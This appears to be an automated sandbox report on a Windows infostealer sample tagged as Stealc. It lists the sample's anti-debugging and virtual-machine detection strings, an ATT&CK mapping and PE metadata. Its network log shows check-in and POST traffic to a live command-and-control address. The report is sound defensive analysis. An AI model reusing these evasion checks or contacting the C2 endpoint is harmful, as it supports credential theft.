                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00373B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00373B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00374B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00374B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0036DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0036EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0036BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0036DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00361160 GetSystemInfo,ExitProcess,0_2_00361160
                Source: file.exe, file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2107623366.0000000000F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxv
                Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]
                Source: file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2107623366.0000000000F93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37631
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37685
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37634
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37645
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37519
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end node graph_0-37653
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00364610 VirtualProtect ?,00000004,00000100,000000000_2_00364610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00379BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379AA0 mov eax, dword ptr fs:[00000030h]0_2_00379AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00377690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00379790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00379790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003798E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_003798E0
                Source: file.exe, file.exe, 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: IProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A75A8 cpuid 0_2_003A75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00377D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00377B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003779E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003779E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00377BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00377BC0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2057789916.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4448, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (techniques listed per tactic; the numbers preceding a technique name are reproduced as the report shows them)

                • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                • Execution: 2 Command and Scripting Interpreter, 12 Native API, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                • Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                • Privilege Escalation: 11 Process Injection, 1 DLL Side-Loading, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                • Defense Evasion: 1 Masquerading, 33 Virtualization/Sandbox Evasion, 11 Disable or Modify Tools, 11 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 12 Software Packing, 1 DLL Side-Loading
                • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                • Discovery: 2 System Time Discovery, 641 Security Software Discovery, 33 Virtualization/Sandbox Evasion, 13 Process Discovery, 1 Account Discovery, 1 System Owner/User Discovery, 1 File and Directory Discovery, 334 System Information Discovery
                • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                • Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                • Command and Control: 2 Encrypted Channel, 2 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                • Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.206/6c4adf523b719729.php/s | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    http://185.215.113.206 | file.exe, 00000000.00000002.2107623366.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                    http://185.215.113.206/J | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    http://185.215.113.206/ws | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    http://185.215.113.206/6c4adf523b719729.phpEs | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    http://185.215.113.206/6c4adf523b719729.php% | file.exe, 00000000.00000002.2107623366.0000000000F79000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                    https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2057789916.0000000004DDB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                                   IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                   185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1545193
                                  Start date and time:2024-10-30 08:21:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 14s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                   Number of new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 127
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
                                   Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                   185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                                  No context
                                   Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                   WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                    | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                                    | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.958646180025865
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'104'320 bytes
                                  MD5:08c45770fb113a8cc6eabcf3eb588ca6
                                  SHA1:a034829953fc29313687c189cff3990faa2cb3d1
                                  SHA256:93faedac76dce091632f52fcbabc5e2148ad2e9e145e2f44bdf733416301c15b
                                  SHA512:0daee38b3e3067ed0873b733e0f9a65fce1ec5e50a56d47d6251829655614c156d03374e26537d0690fa572f3766fd0ffc185ce91c51f5f536383737254508f6
                                  SSDEEP:49152:Rv1JdNdoT6VBZwuqSZn4cS8NoLaQovdaA3yCkQ:RvBe6dqbGo+Qovda+yU
                                  TLSH:33A533615912C1C8CBCCBD3B73761912A87AA28C752B668B778D9403D4E6DBF11172FC
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xb1b000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F51CCF5459Ah
                                  psubd mm3, qword ptr [edi]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                                   Name | Virtual Address | Virtual Size | Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                   (unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 0fb02670bb39bf8e3d6c224b16bb0368 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   (unnamed) | 0x2ea000 | 0x299000 | 0x200 | 50e164b4c94af9cefc8fbd607d0abbdd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   qogoldvk | 0x583000 | 0x197000 | 0x196c00 | 6e754aad1857b156add702bcc20f6e32 | False | 0.9947474502535341 | data | 7.95459631398814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   tvuayiyt | 0x71a000 | 0x1000 | 0x400 | e076ce68b960174fcd253756b5678df8 | False | 0.8291015625 | data | 6.4686041480574605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   .taggant | 0x71b000 | 0x3000 | 0x2200 | 0c268ce32e4949b4a44d2d05cf7c1b88 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                   DLL | Import
                                   kernel32.dll | lstrcpy
                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                   2024-10-30T08:22:06.290913+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Oct 30, 2024 08:22:04.780353069 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:04.837630033 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                   Oct 30, 2024 08:22:04.837735891 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:04.837877035 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:04.843225002 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                   Oct 30, 2024 08:22:05.759641886 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                   Oct 30, 2024 08:22:05.759730101 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:05.995903015 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:06.001944065 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                   Oct 30, 2024 08:22:06.290826082 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                   Oct 30, 2024 08:22:06.290913105 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                   Oct 30, 2024 08:22:09.254595995 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  • 185.215.113.206
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 4448 | C:\Users\user\Desktop\file.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   Oct 30, 2024 08:22:04.837877035 CET | 90 | OUT | GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                   Oct 30, 2024 08:22:05.759641886 CET | 203 | IN | HTTP/1.1 200 OK
                                  Date: Wed, 30 Oct 2024 07:22:05 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                   Oct 30, 2024 08:22:05.995903015 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKK
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
